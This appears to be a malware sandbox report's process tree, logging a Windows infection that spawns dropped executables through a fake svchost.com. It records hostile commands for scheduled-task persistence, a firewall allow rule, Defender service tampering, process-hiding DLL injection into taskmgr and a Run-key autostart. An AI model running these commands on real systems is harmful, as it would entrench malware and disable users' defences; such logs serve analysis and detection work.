-
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe"C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4708 --field-trial-handle=2204,i,14564913232005053714,11852687231911104687,262144 --variations-seed-version /prefetch:17⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe" https://www.facebook.com/video5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exeC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe https://www.facebook.com/video6⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe" https://accounts.google.com5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exeC:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe https://accounts.google.com6⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" https://www.youtube.com5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exeC:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe https://www.youtube.com6⤵
- Enumerates system info in registry
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exeC:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9ef9f9758,0x7ff9ef9f9768,0x7ff9ef9f97787⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1728 --field-trial-handle=1968,i,16499935851690038992,4239014145097381765,131072 /prefetch:27⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1968,i,16499935851690038992,4239014145097381765,131072 /prefetch:87⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" https://www.facebook.com/video5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exeC:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe https://www.facebook.com/video6⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exeC:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9ef9f9758,0x7ff9ef9f9768,0x7ff9ef9f97787⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=2344,i,7630010782019284563,5573192320795128672,131072 /prefetch:27⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1900 --field-trial-handle=2344,i,7630010782019284563,5573192320795128672,131072 /prefetch:87⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1952 --field-trial-handle=2344,i,7630010782019284563,5573192320795128672,131072 /prefetch:87⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2948 --field-trial-handle=2344,i,7630010782019284563,5573192320795128672,131072 /prefetch:17⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2964 --field-trial-handle=2344,i,7630010782019284563,5573192320795128672,131072 /prefetch:17⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3956 --field-trial-handle=2344,i,7630010782019284563,5573192320795128672,131072 /prefetch:17⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4620 --field-trial-handle=2344,i,7630010782019284563,5573192320795128672,131072 /prefetch:17⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4924 --field-trial-handle=2344,i,7630010782019284563,5573192320795128672,131072 /prefetch:17⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4880 --field-trial-handle=2344,i,7630010782019284563,5573192320795128672,131072 /prefetch:17⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" https://accounts.google.com5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exeC:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe https://accounts.google.com6⤵
- Enumerates system info in registry
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exeC:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9ef9f9758,0x7ff9ef9f9768,0x7ff9ef9f97787⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=1996,i,1439782248871668796,6662601208340179014,131072 /prefetch:27⤵
-
C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe"C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1880 --field-trial-handle=1996,i,1439782248871668796,6662601208340179014,131072 /prefetch:87⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\PROGRA~1\MOZILL~1\firefox.exe" https://www.youtube.com5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\PROGRA~1\MOZILL~1\firefox.exeC:\PROGRA~1\MOZILL~1\firefox.exe https://www.youtube.com6⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exeC:\PROGRA~1\MOZILL~1\firefox.exe https://www.youtube.com7⤵
- Checks processor information in registry
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="184.0.832176487\363933237" -parentBuildID 20221007134813 -prefsHandle 1672 -prefMapHandle 1740 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\PROGRA~1\MOZILL~1\browser" - {f5a7c490-0c29-496e-8b8d-d0ca7f5c5b1a} 184 "\\.\pipe\gecko-crash-server-pipe.184" 1840 20cff6f7e58 gpu8⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="184.1.53943056\808043146" -parentBuildID 20221007134813 -prefsHandle 1980 -prefMapHandle 1976 -prefsLen 17556 -prefMapSize 230321 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {b012a141-82d2-4acb-8461-4519dd9d9760} 184 "\\.\pipe\gecko-crash-server-pipe.184" 1948 20cffb45f58 socket8⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exeC:\PROGRA~1\MOZILL~1\firefox.exe https://www.youtube.com8⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exeC:\PROGRA~1\MOZILL~1\firefox.exe https://www.youtube.com9⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\PROGRA~1\MOZILL~1\firefox.exe" https://www.facebook.com/video5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\PROGRA~1\MOZILL~1\firefox.exeC:\PROGRA~1\MOZILL~1\firefox.exe https://www.facebook.com/video6⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="3092.0.462129499\160012960" -parentBuildID 20221007134813 -prefsHandle 1732 -prefMapHandle 1724 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\PROGRA~1\MOZILL~1\browser" - {47a60a74-d1b6-4b77-bfdb-727aff1a55b4} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 1808 1a4a7ffb258 gpu7⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="3092.1.1464313438\1771366002" -parentBuildID 20221007134813 -prefsHandle 2028 -prefMapHandle 2016 -prefsLen 17556 -prefMapSize 230321 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {c01d330d-796c-453d-9031-429f6f770b67} 3092 "\\.\pipe\gecko-crash-server-pipe.3092" 2040 1a4a844a658 socket7⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exeC:\PROGRA~1\MOZILL~1\firefox.exe https://www.facebook.com/video7⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exeC:\PROGRA~1\MOZILL~1\firefox.exe https://www.facebook.com/video8⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="3900.0.1589618986\1329835082" -parentBuildID 20221007134813 -prefsHandle 1716 -prefMapHandle 1708 -prefsLen 20749 -prefMapSize 233504 -appDir "C:\PROGRA~1\MOZILL~1\browser" - {22fa3752-793e-4954-af90-ae789845bba5} 3900 "\\.\pipe\gecko-crash-server-pipe.3900" 1796 1fb193f5758 gpu9⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="3900.1.326560572\912235682" -parentBuildID 20221007134813 -prefsHandle 2256 -prefMapHandle 2252 -prefsLen 21565 -prefMapSize 233504 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {853056b3-3820-4072-94f2-eab36819d092} 3900 "\\.\pipe\gecko-crash-server-pipe.3900" 2284 1fb0d170f58 socket9⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="3900.2.1633403560\90669553" -childID 1 -isForBrowser -prefsHandle 3028 -prefMapHandle 2968 -prefsLen 21668 -prefMapSize 233504 -jsInitHandle 1232 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {b7320a38-c9b0-41ff-af56-a4a1288c788d} 3900 "\\.\pipe\gecko-crash-server-pipe.3900" 2536 1fb1cc67658 tab9⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="3900.3.1389076131\1032992081" -childID 2 -isForBrowser -prefsHandle 3508 -prefMapHandle 3376 -prefsLen 21709 -prefMapSize 233504 -jsInitHandle 1232 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {8fea23f4-7871-4885-98c4-d6c51a6ee27d} 3900 "\\.\pipe\gecko-crash-server-pipe.3900" 3476 1fb1a6f6058 tab9⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="3900.4.255996161\1035155210" -childID 3 -isForBrowser -prefsHandle 3352 -prefMapHandle 3448 -prefsLen 21709 -prefMapSize 233504 -jsInitHandle 1232 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {d408fbae-32d4-44c2-8788-a705afb79ba2} 3900 "\\.\pipe\gecko-crash-server-pipe.3900" 3424 1fb188d4958 tab9⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="3900.5.349937421\478307005" -childID 4 -isForBrowser -prefsHandle 3800 -prefMapHandle 3796 -prefsLen 21709 -prefMapSize 233504 -jsInitHandle 1232 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {145c58be-6e3f-435c-870d-cef1738de484} 3900 "\\.\pipe\gecko-crash-server-pipe.3900" 3648 1fb0d170058 tab9⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="3900.6.237568064\407249478" -childID 5 -isForBrowser -prefsHandle 4408 -prefMapHandle 4404 -prefsLen 26331 -prefMapSize 233504 -jsInitHandle 1232 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {ec1b7710-2236-44bb-aac8-2f2bf95e145e} 3900 "\\.\pipe\gecko-crash-server-pipe.3900" 4420 1fb0d160c58 tab9⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\PROGRA~1\MOZILL~1\firefox.exe" https://accounts.google.com5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\PROGRA~1\MOZILL~1\firefox.exeC:\PROGRA~1\MOZILL~1\firefox.exe https://accounts.google.com6⤵
- Checks processor information in registry
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="3804.0.478520870\914889669" -parentBuildID 20221007134813 -prefsHandle 1708 -prefMapHandle 1700 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\PROGRA~1\MOZILL~1\browser" - {f26f46f6-94fe-4ab9-93aa-d8aeddedd50c} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 1800 2127f5d9b58 gpu7⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="3804.1.1421559869\521063983" -parentBuildID 20221007134813 -prefsHandle 2272 -prefMapHandle 2268 -prefsLen 21623 -prefMapSize 233444 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {0bbe839c-a8b5-4ecd-af61-f09566d310a0} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 2296 21273b6f458 socket7⤵
-
C:\PROGRA~1\MOZILL~1\firefox.exe"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="3804.2.1399903931\793382129" -childID 1 -isForBrowser -prefsHandle 3048 -prefMapHandle 3044 -prefsLen 21726 -prefMapSize 233444 -jsInitHandle 1276 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\PROGRA~1\MOZILL~1\browser" - {65aaa8e9-1081-4769-a28b-aaf04f470633} 3804 "\\.\pipe\gecko-crash-server-pipe.3804" 3060 212030e0258 tab7⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\288C47~1.EXE"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\288C47~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\288C47~1.EXE4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\INSTAL~1.EXE"5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\INSTAL~1.EXEC:\Users\Admin\AppData\Local\Temp\INSTAL~1.EXE6⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\UBK0~1.EXE"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\UBK0~1.EXEC:\Users\Admin\AppData\Local\Temp\UBK0~1.EXE8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 10609⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\UBK1~1.EXE"7⤵
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\UBK1~1.EXEC:\Users\Admin\AppData\Local\Temp\UBK1~1.EXE8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "9⤵
-
C:\Windows\SysWOW64\chcp.comchcp 125110⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F10⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 11367⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\288C47~1.EXEC:\Users\Admin\AppData\Local\Temp\288C47~1.EXE6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
-
C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"8⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes9⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F9⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll9⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F9⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)10⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)11⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F9⤵
- Creates scheduled task(s)
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\WINDOW~1.EXE"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\WINDOW~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\WINDOW~1.EXE4⤵
- Executes dropped EXE
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\asas.exeC:\Users\Admin\AppData\Local\Temp\Files\asas.exe4⤵
-
C:\Windows\System32\werfault.exe\??\C:\Windows\System32\werfault.exe5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~1.EXE"3⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\INSTAL~1.EXE4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U4BK0~1.EXE"5⤵
-
C:\Users\Admin\AppData\Local\Temp\U4BK0~1.EXEC:\Users\Admin\AppData\Local\Temp\U4BK0~1.EXE6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 12967⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U4BK1~1.EXE"5⤵
-
C:\Users\Admin\AppData\Local\Temp\U4BK1~1.EXEC:\Users\Admin\AppData\Local\Temp\U4BK1~1.EXE6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 11525⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\DELTA_~1.EXE"3⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\DELTA_~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\DELTA_~1.EXE4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\288C47~2.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\288C47~2.EXEC:\Users\Admin\AppData\Local\Temp\Files\288C47~2.EXE4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 8325⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\hv.exeC:\Users\Admin\AppData\Local\Temp\Files\hv.exe4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists';New-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists' -Value '"C:\Users\Admin\AppData\Local\LibraryApp_for_translators_and_linguists\LibraryApp_for_translators_and_linguists.exe"' -PropertyType 'String'5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 11405⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\svc.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\svc.exeC:\Users\Admin\AppData\Local\Temp\Files\svc.exe4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\august.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\august.exeC:\Users\Admin\AppData\Local\Temp\Files\august.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BKD7L.tmp\august.tmp"C:\Users\Admin\AppData\Local\Temp\is-BKD7L.tmp\august.tmp" /SL5="$50432,1592988,56832,C:\Users\Admin\AppData\Local\Temp\Files\august.exe"5⤵
-
